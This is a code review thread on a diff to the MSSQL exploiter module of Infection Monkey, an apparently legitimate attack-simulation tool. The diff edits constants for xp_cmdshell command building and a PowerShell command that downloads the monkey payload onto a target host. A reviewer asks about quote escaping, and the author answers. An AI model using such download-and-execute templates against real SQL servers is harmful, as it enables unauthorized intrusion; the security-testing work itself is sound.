monkey/infection_monkey/exploit/mssqlexec.py

```diff
@@ -31,27 +29,18 @@ class MSSQLExploiter(HostExploiter):
 
     # Temporary file that saves commands for monkey's download and execution.
     TMP_FILE_NAME = "tmp_monkey.bat"
-    TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
+    TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir"
 
-    MAX_XP_CMDSHELL_COMMAND_SIZE = 128
-
-    XP_CMDSHELL_COMMAND_START = 'xp_cmdshell "'
-    XP_CMDSHELL_COMMAND_END = '"'
-    EXPLOIT_COMMAND_PREFIX = "<nul set /p="
-    EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
-    CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
     MONKEY_DOWNLOAD_COMMAND = (
         "powershell (new-object System.Net.WebClient)."
-        "DownloadFile(^'{http_path}^' , ^'{dst_path}^')"
+        "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')"
```

Comment:
Why are there two single quotes? That's somehow an escape?

Reply:
Yeah. I meant to add a comment.